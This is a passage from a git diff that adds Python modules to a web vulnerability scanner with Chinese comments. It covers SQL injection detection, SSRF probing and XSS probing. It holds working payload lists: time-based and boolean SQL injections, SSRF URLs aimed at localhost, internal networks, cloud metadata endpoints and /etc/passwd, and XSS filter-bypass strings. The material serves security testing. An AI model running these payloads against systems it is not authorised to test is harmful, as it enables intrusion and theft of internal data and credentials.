+                "')) OR SLEEP(3)--",
+                "' AND SLEEP(3)--",
+                "\" AND SLEEP(3)--",
+                "')) AND SLEEP(3)--",
+                "'; WAITFOR DELAY '0:0:3'--",
+                "\"; WAITFOR DELAY '0:0:3'--",
+                "')); WAITFOR DELAY '0:0:3'--",
+                "' OR pg_sleep(3)--",
+                "\" OR pg_sleep(3)--",
+                "')) OR pg_sleep(3)--"
+            ],
+            'boolean_based': [
+                "' AND 1=1--",
+                "' AND 1=2--",
+                "\" AND 1=1--",
+                "\" AND 1=2--",
+                "')) AND 1=1--",
+                "')) AND 1=2--",
+                "' AND '1'='1'--",
+                "' AND '1'='2'--",
+                "\" AND \"1\"=\"1\"--",
+                "\" AND \"1\"=\"2\"--",
+                "')) AND ('1'='1')--",
+                "')) AND ('1'='2')--"
+            ]
+        }
+        
+        # SQL错误特征
+        self.sql_errors = [
+            "SQL syntax.*?MySQL", "Warning.*?mysqli", "MySQLSyntaxErrorException",
+            "valid MySQL result", "check the manual that corresponds to your (MySQL|MariaDB) server version",
+            "MySqlClient\\.", "com\\.mysql\\.jdbc", "Zend_Db_(Adapter|Statement)_Mysqli_Exception",
+            "SQLSTATE\\[\\d+\\]: Syntax error or access violation", "Uncaught mysqli_sql_exception",
+            
+            "ORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*?Driver", "Warning.*?oci_.*", "OracleConnection",
+            "quoted string not properly terminated", "ORA-00936: missing expression",
+            
+            "Microsoft SQL Server", "MSSQL.*?Driver", "MSSQL.*?Exception", "Msg \\d+, Level \\d+, State \\d+",
+            "Unclosed quotation mark after the character string", "Incorrect syntax near",
+            
+            "PostgreSQL.*?ERROR", "Warning.*?Pg_.*", "valid PostgreSQL result", "PgSqlException",
+            "PSQLException", "org\\.postgresql\\.util\\.PSQLException",
+            
+            "CLI Driver.*?DB2", "DB2 SQL error", "db2_\\w+\\(",
+            
+            "SQLite3::query", "SQLite3Result", "SQLitException",
+            
+            "Warning.*?sqlite_.*?", "Warning.*?PDO::.*?",
+            
+            "HY000", "Dynamic SQL Error", "System\\.Data\\.SqlClient\\.SqlException", 
+            "Exception.*?Sybase.*?", "Sybase message", "Sybase.*?Server message"
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的SQL注入漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描SQL注入: {field.get('name')} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 构建基准表单数据，用于比较
+        base_form_data = {}
+        for f in form.get('fields', []):
+            if f.get('name'):
+                # 对于目标字段使用无害值
+                if f['name'] == field['name']:
+                    base_form_data[f['name']] = 'test123'
+                else:
+                    base_form_data[f['name']] = f.get('value', '')
+        
+        # 发送基准请求
+        if method == 'POST':
+            base_response = self.http_client.post(action_url, data=base_form_data)
+        else:
+            base_response = self.http_client.get(action_url, params=base_form_data)
+            
+        if not base_response:
+            return None
+            
+        # 测试基于错误的SQL注入
+        for payload in self.payloads['error_based']:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            if not inject_response:
+                continue
+                
+            # 检查是否有SQL错误
+            if self._check_sql_errors(inject_response.text):
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Error-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于错误的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在SQL注入漏洞，攻击者可能能够执行任意SQL查询",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+        
+        # 测试基于时间的SQL注入
+        for payload in self.payloads['time_based']:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 记录开始时间
+            start_time = time.time()
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            # 计算响应时间
+            response_time = time.time() - start_time
+            
+            # 如果响应时间超过了预期的延迟时间（考虑网络延迟），则可能存在时间盲注
+            if response_time > 2.5:  # 考虑到网络延迟，使用略小于3秒的阈值
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Time-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于时间的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在基于时间的SQL注入漏洞，响应时间为{response_time:.2f}秒",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+        
+        # 测试基于布尔的SQL注入
+        boolean_results = {}
+        for payload in self.payloads['boolean_based']:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            if not inject_response:
+                continue
+                
+            # 记录响应内容和长度
+            response_content = inject_response.text if hasattr(inject_response, 'text') else ''
+            response_length = len(response_content)
+            
+            # 提取payload的逻辑部分，如1=1或1=2
+            if "1=1" in payload or "'1'='1'" in payload or "\"1\"=\"1\"" in payload:
+                logic_type = 'TRUE'
+            else:
+                logic_type = 'FALSE'
+                
+            # 记录结果
+            if logic_type not in boolean_results:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'TRUE' and response_length > boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'FALSE' and response_length < boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+        
+        # 如果收集到了两种逻辑的结果，比较它们
+        if 'TRUE' in boolean_results and 'FALSE' in boolean_results:
+            true_length = boolean_results['TRUE']['length']
+            false_length = boolean_results['FALSE']['length']
+            
+            # 如果长度差异明显，则可能存在布尔盲注
+            if abs(true_length - false_length) > 10:
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在布尔盲注漏洞，TRUE条件下响应长度为{true_length}，FALSE条件下响应长度为{false_length}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+            
+            # 如果内容差异明显，则可能存在布尔盲注
+            true_content = boolean_results['TRUE']['content']
+            false_content = boolean_results['FALSE']['content']
+            similarity = SequenceMatcher(None, true_content, false_content).ratio()
+            
+            if similarity < 0.9:  # 相似度低于90%
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在布尔盲注漏洞，TRUE和FALSE条件下的响应内容相似度为{similarity:.2f}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的SQL注入漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        logger.debug(f"扫描SQL注入参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 构建基准参数，用于比较
+        base_params = query_params.copy()
+        base_params[param] = 'test123'
+        
+        # 发送基准请求
+        base_response = self.http_client.get(f"{base_url}?{urlencode(base_params)}")
+        if not base_response:
+            return None
+            
+        # 测试基于错误的SQL注入
+        for payload in self.payloads['error_based']:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(f"{base_url}?{urlencode(inject_params)}")
+            if not inject_response:
+                continue
+                
+            # 检查是否有SQL错误
+            if self._check_sql_errors(inject_response.text):
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Error-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于错误的SQL注入漏洞",
+                    'details': f"URL参数{param}存在SQL注入漏洞，攻击者可能能够执行任意SQL查询",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+        
+        # 测试基于时间的SQL注入
+        for payload in self.payloads['time_based']:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 记录开始时间
+            start_time = time.time()
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(f"{base_url}?{urlencode(inject_params)}")
+            
+            # 计算响应时间
+            response_time = time.time() - start_time
+            
+            # 如果响应时间超过了预期的延迟时间（考虑网络延迟），则可能存在时间盲注
+            if response_time > 2.5:  # 考虑到网络延迟，使用略小于3秒的阈值
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Time-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于时间的SQL注入漏洞",
+                    'details': f"URL参数{param}存在基于时间的SQL注入漏洞，响应时间为{response_time:.2f}秒",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+        
+        # 测试基于布尔的SQL注入
+        boolean_results = {}
+        for payload in self.payloads['boolean_based']:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(f"{base_url}?{urlencode(inject_params)}")
+            if not inject_response:
+                continue
+                
+            # 记录响应内容和长度
+            response_content = inject_response.text if hasattr(inject_response, 'text') else ''
+            response_length = len(response_content)
+            
+            # 提取payload的逻辑部分，如1=1或1=2
+            if "1=1" in payload or "'1'='1'" in payload or "\"1\"=\"1\"" in payload:
+                logic_type = 'TRUE'
+            else:
+                logic_type = 'FALSE'
+                
+            # 记录结果
+            if logic_type not in boolean_results:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'TRUE' and response_length > boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'FALSE' and response_length < boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+        
+        # 如果收集到了两种逻辑的结果，比较它们
+        if 'TRUE' in boolean_results and 'FALSE' in boolean_results:
+            true_length = boolean_results['TRUE']['length']
+            false_length = boolean_results['FALSE']['length']
+            
+            # 如果长度差异明显，则可能存在布尔盲注
+            if abs(true_length - false_length) > 10:
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"URL参数{param}存在布尔盲注漏洞，TRUE条件下响应长度为{true_length}，FALSE条件下响应长度为{false_length}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+            
+            # 如果内容差异明显，则可能存在布尔盲注
+            true_content = boolean_results['TRUE']['content']
+            false_content = boolean_results['FALSE']['content']
+            similarity = SequenceMatcher(None, true_content, false_content).ratio()
+            
+            if similarity < 0.9:  # 相似度低于90%
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"URL参数{param}存在布尔盲注漏洞，TRUE和FALSE条件下的响应内容相似度为{similarity:.2f}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+                
+        return None
+    
+    def _check_sql_errors(self, content):
+        """
+        检查响应内容中是否包含SQL错误
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含SQL错误
+        """
+        if not content:
+            return False
+            
+        for error in self.sql_errors:
+            if re.search(error, content, re.IGNORECASE):
+                return True
+                
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/ssrf_scanner.py b/xss_scanner/scanners/ssrf_scanner.py
new file mode 100644
index 0000000..a8d6d29
--- /dev/null
+++ b/xss_scanner/scanners/ssrf_scanner.py
@@ -0,0 +1,351 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SSRF（服务器端请求伪造）扫描器模块，负责扫描SSRF漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import uuid
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class SSRFScanner:
+    """SSRF扫描器类，负责扫描服务器端请求伪造漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SSRF扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成唯一标识符，用于检测SSRF漏洞
+        self.ssrf_id = str(uuid.uuid4()).replace('-', '')[:16]
+        
+        # SSRF检测域名
+        # 注意：在实际使用中，应该使用攻击者控制的服务器
+        # 这里提供的域名仅用于演示目的，需要替换为实际的回调服务器
+        self.callback_domain = f"https://ssrf-check.example.com/{self.ssrf_id}"
+        self.burp_collaborator = f"http://{self.ssrf_id}.burpcollaborator.net"
+        self.interact_domain = f"http://{self.ssrf_id}.interact.sh"
+        
+        # SSRF检测Payload
+        self.payloads = [
+            # 基本检测
+            self.callback_domain,
+            self.burp_collaborator,
+            self.interact_domain,
+            
+            # IP形式
+            "http://127.0.0.1",
+            "http://localhost",
+            "http://[::1]",
+            "http://0.0.0.0",
+            "http://0177.0000.0000.0001",  # 127.0.0.1的八进制表示
+            "http://2130706433",  # 127.0.0.1的整数表示
+            "http://0x7f.0x0.0x0.0x1",  # 127.0.0.1的十六进制表示
+            
+            # 内网 IP 范围
+            "http://10.0.0.1",
+            "http://172.16.0.1",
+            "http://192.168.0.1",
+            "http://169.254.169.254",  # AWS元数据
+            "http://metadata.google.internal",  # GCP元数据
+            
+            # 不同端口
+            "http://127.0.0.1:22",  # SSH
+            "http://127.0.0.1:3306",  # MySQL
+            "http://127.0.0.1:5432",  # PostgreSQL
+            "http://127.0.0.1:6379",  # Redis
+            "http://127.0.0.1:9200",  # Elasticsearch
+            "http://127.0.0.1:8080",  # 常见Web端口
+            
+            # 不同协议
+            "https://127.0.0.1",
+            "ftp://127.0.0.1",
+            "gopher://127.0.0.1:25/",  # SMTP
+            "file:///etc/passwd",
+            "dict://127.0.0.1:6379/info",  # Redis
+            
+            # 平台相关
+            "http://169.254.169.254/latest/meta-data/",  # AWS
+            "http://metadata.google.internal/computeMetadata/v1/",  # GCP
+            "http://169.254.169.254/metadata/v1/",  # DigitalOcean
+            "http://169.254.169.254/metadata",  # Azure
+            
+            # URL编码绕过
+            "http://%31%32%37%2e%30%2e%30%2e%31",  # 127.0.0.1
+            "http://127.0.0.1%23@example.com",  # 使用URL片段
+            "http://127.0.0.1%2f@example.com",  # 使用斜杠
+            
+            # DNS重绑定攻击
+            f"http://{self.ssrf_id}.example.com",  # 会解析到内网IP
+            
+            # 使用用户名密码形式
+            "http://user:pass@127.0.0.1",
+            
+            # 空字节绕过 (适用于某些语言)
+            "http://127.0.0.1%00",
+            
+            # 使用域名 + 解析到内部IP的域名
+            "http://spoofed.burpcollaborator.net",
+            
+            # 利用重定向的SSRF
+            "http://redirector.example.com/?url=http://127.0.0.1"
+        ]
+        
+        # 可能的SSRF成功特征
+        self.success_patterns = [
+            # 服务器响应特征
+            "ssh-[0-9].[0-9]", # SSH banner
+            "mysql", # MySQL
+            "postgresql", # PostgreSQL
+            "redis_version", # Redis
+            "elastic", # Elasticsearch
+            "instance-id", # AWS metadata
+            "metadata", # Cloud metadata
+            "computeMetadata", # GCP metadata
+            
+            # 常见HTTP回显内容
+            "<!DOCTYPE html>",
+            "<html",
+            "<head",
+            "<body",
+            
+            # 系统文件特征
+            "root:.*:0:0:",
+            "bin:.*:1:1:",
+            
+            # 错误消息特征
+            "Connection refused",
+            "No route to host",
+            "Name or service not known",
+            "Network is unreachable",
+            
+            # 特定应用程序的特征
+            "Apache",
+            "nginx",
+            "IIS",
+            "Express",
+            "Tomcat",
+            
+            # HTTP头
+            "X-Powered-By:",
+            "Server:",
+            
+            # 自定义回调标记
+            self.ssrf_id
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的SSRF漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在SSRF的字段名称
+        ssrf_prone_fields = [
+            'url', 'uri', 'link', 'host', 'ip', 'address', 'target', 'site',
+            'website', 'web', 'src', 'source', 'dest', 'destination', 'redirect',
+            'redirect_to', 'redirect_url', 'callback', 'api', 'endpoint',
+            'webhook', 'proxy', 'fetch', 'resource', 'feed', 'service',
+            'location', 'remote', 'forward', 'next', 'continue', 'return',
+            'return_url', 'continue_url', 'next_url', 'request'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in ssrf_prone_fields):
+            return None
+            
+        logger.debug(f"扫描SSRF: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测SSRF漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_ssrf_success(response.text):
+                    return {
+                        'type': 'SSRF',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现服务器端请求伪造(SSRF)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在SSRF漏洞，可以访问内部网络资源",
+                        'recommendation': "实施URL白名单，使用间接引用，禁止访问内部网络资源，限制响应大小和类型"
+                    }
+                    
+                # 在实际环境中，还需要检查回调服务器是否收到了请求
+                # 由于这是模拟环境，该步骤被省略
+            except Exception as e:
+                logger.error(f"扫描SSRF时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的SSRF漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在SSRF的参数名称
+        ssrf_prone_params = [
+            'url', 'uri', 'link', 'host', 'ip', 'address', 'target', 'site',
+            'website', 'web', 'src', 'source', 'dest', 'destination', 'redirect',
+            'redirect_to', 'redirect_url', 'callback', 'api', 'endpoint',
+            'webhook', 'proxy', 'fetch', 'resource', 'feed', 'service',
+            'location', 'remote', 'forward', 'next', 'continue', 'return',
+            'return_url', 'continue_url', 'next_url', 'request'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in ssrf_prone_params):
+            return None
+            
+        logger.debug(f"扫描SSRF参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测SSRF漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                response = self.http_client.get(test_url)
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_ssrf_success(response.text):
+                    return {
+                        'type': 'SSRF',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现服务器端请求伪造(SSRF)漏洞",
+                        'details': f"URL参数{param}存在SSRF漏洞，可以访问内部网络资源",
+                        'recommendation': "实施URL白名单，使用间接引用，禁止访问内部网络资源，限制响应大小和类型"
+                    }
+                    
+                # 在实际环境中，还需要检查回调服务器是否收到了请求
+                # 由于这是模拟环境，该步骤被省略
+            except Exception as e:
+                logger.error(f"扫描SSRF参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_ssrf_success(self, content):
+        """
+        检查响应内容中是否包含SSRF成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含SSRF成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查成功特征
+        for pattern in self.success_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        return False
+    
+    def check_callback_server(self):
+        """
+        检查回调服务器是否收到请求（在实际环境中实现）
+        
+        Returns:
+            bool: 是否收到回调请求
+        """
+        # 此功能在实际环境中需要实现
+        # 这里只是一个占位函数
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/xss_scanner.py b/xss_scanner/scanners/xss_scanner.py
new file mode 100644
index 0000000..13756de
--- /dev/null
+++ b/xss_scanner/scanners/xss_scanner.py
@@ -0,0 +1,710 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS扫描器模块，负责扫描XSS漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import base64
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+from bs4 import BeautifulSoup
+
+try:
+    from selenium import webdriver
+    from selenium.webdriver.chrome.options import Options
+    from selenium.common.exceptions import TimeoutException, WebDriverException
+    SELENIUM_AVAILABLE = True
+except ImportError:
+    SELENIUM_AVAILABLE = False
+
+from xss_scanner.utils.tech_detector import TechDetector
+
+logger = logging.getLogger('xss_scanner')
+
+class XSSScanner:
+    """XSS扫描器类，负责扫描XSS漏洞"""
+    
+    def __init__(self, http_client, payload_level=2, use_browser=False):
+        """
+        初始化XSS扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+            payload_level: Payload复杂度级别，1-基础，2-标准，3-高级
+            use_browser: 是否使用真实浏览器检测
+        """
+        self.http_client = http_client
+        self.payload_level = payload_level
+        self.use_browser = use_browser and SELENIUM_AVAILABLE
+        self.driver = None
+        
+        # 初始化技术检测器
+        self.tech_detector = TechDetector()
+        
+        # 存储检测到的技术信息
+        self.tech_info = {
+            'frontend': [],
+            'backend': [],
+            'server': [],
+            'waf': []
+        }
+        
+        # 初始化浏览器
+        if self.use_browser:
+            self._init_browser()
+            
+        # 随机生成的标记，用于检测XSS漏洞
+        self.xss_mark = self._generate_random_string(8)
+        
+        # 加载XSS Payload
+        self.payloads = self._load_payloads()
+        
+        # 加载WAF绕过Payload
+        self.waf_bypass_payloads = self._load_payloads_from_file('xss_waf_bypass.txt')
+    
+    def _init_browser(self):
+        """初始化浏览器"""
+        if not SELENIUM_AVAILABLE:
+            logger.warning("未安装Selenium，无法使用浏览器功能")
+            self.use_browser = False
+            return
+            
+        try:
+            chrome_options = Options()
+            chrome_options.add_argument('--headless')
+            chrome_options.add_argument('--disable-gpu')
+            chrome_options.add_argument('--no-sandbox')
+            chrome_options.add_argument('--disable-dev-shm-usage')
+            chrome_options.add_argument('--disable-extensions')
+            chrome_options.add_argument('--disable-notifications')
+            
+            self.driver = webdriver.Chrome(options=chrome_options)
+            self.driver.set_page_load_timeout(10)
+            logger.info("浏览器初始化成功")
+        except Exception as e:
+            logger.error(f"浏览器初始化失败: {str(e)}")
+            self.use_browser = False
+    
+    def _load_payloads(self):
+        """
+        加载XSS Payload
+        
+        Returns:
+            list: XSS Payload列表
+        """
+        # 尝试从文件加载Payload
+        filename = f"xss_level{self.payload_level}.txt"
+        file_payloads = self._load_payloads_from_file(filename)
+        
+        if file_payloads:
+            return file_payloads
+        
+        # 如果文件加载失败，则使用内置的Payload
+        # 基础XSS Payload，适用于所有场景
+        basic_payloads = [
+            f"<script>alert('{self.xss_mark}')</script>",
+            f"<img src=x onerror=alert('{self.xss_mark}')>",
+            f"<svg onload=alert('{self.xss_mark}')>",
+            f"<body onload=alert('{self.xss_mark}')>",
+            f"<iframe onload=alert('{self.xss_mark}')></iframe>",
+            f"javascript:alert('{self.xss_mark}')",
+            f"<input autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<select autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<textarea autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<keygen autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<video><source onerror=alert('{self.xss_mark}')>",
+            f"<audio src=x onerror=alert('{self.xss_mark}')>",
+            f"><script>alert('{self.xss_mark}')</script>",
+            f"\"><script>alert('{self.xss_mark}')</script>",
+            f"'><script>alert('{self.xss_mark}')</script>",
+            f"><img src=x onerror=alert('{self.xss_mark}')>"
+        ]
+        
+        # 标准XSS Payload，用于绕过简单的防护
+        standard_payloads = [
+            f"<script>alert(String.fromCharCode(88,83,83,77,65,82,75))</script>".replace("XSSMARK", self.xss_mark),
+            f"<img src=x oneonerrorrror=alert('{self.xss_mark}')>",
+            f"<sCRipT>alert('{self.xss_mark}')</sCriPt>",
+            f"<script/x>alert('{self.xss_mark}')</script>",
+            f"<script ~~~>alert('{self.xss_mark}')</script ~~~>",
+            f"<script>setTimeout('alert(\\'{self.xss_mark}\\')',0)</script>",
+            f"<svg/onload=alert('{self.xss_mark}')>",
+            f"<svg><script>alert('{self.xss_mark}')</script>",
+            f"<svg><animate onbegin=alert('{self.xss_mark}') attributeName=x dur=1s>",
+            f"<svg><a><animate attributeName=href values=javascript:alert('{self.xss_mark}') /><text x=20 y=20>Click Me</text></a>",
+            f"<svg><script xlink:href=data:,alert('{self.xss_mark}') />",
+            f"<math><maction actiontype=statusline xlink:href=javascript:alert('{self.xss_mark}')>Click</maction></math>",
+            f"<iframe src=javascript:alert('{self.xss_mark}')></iframe>",
+            f"<object data=javascript:alert('{self.xss_mark}')></object>",
+            f"<embed src=javascript:alert('{self.xss_mark}')></embed>",
+            f"<link rel=import href=data:text/html;base64,{base64.b64encode(f'<script>alert(\'{self.xss_mark}\')</script>'.encode()).decode()}>",
+            f"<x contenteditable onblur=alert('{self.xss_mark}')>lose focus!</x>",
+            f"<style>@keyframes x{{}}*{{}}50%{{background:url('javascript:alert(\"{self.xss_mark}\")')}}</style><div style=animation-name:x>",
+            f"<sVg OnLoAd=alert('{self.xss_mark}')>",
+            f"<img src=`x`onerror=alert('{self.xss_mark}')>",
+            f"<img src='x'onerror=alert('{self.xss_mark}')>",
+            f"<img src=\"x\"onerror=alert('{self.xss_mark}')>"
+        ]
+        
+        # 高级XSS Payload，用于绕过复杂的防护
+        advanced_payloads = [
+            f"<script>eval(atob('{base64.b64encode(f'alert(\'{self.xss_mark}\')'.encode()).decode()}'))</script>",
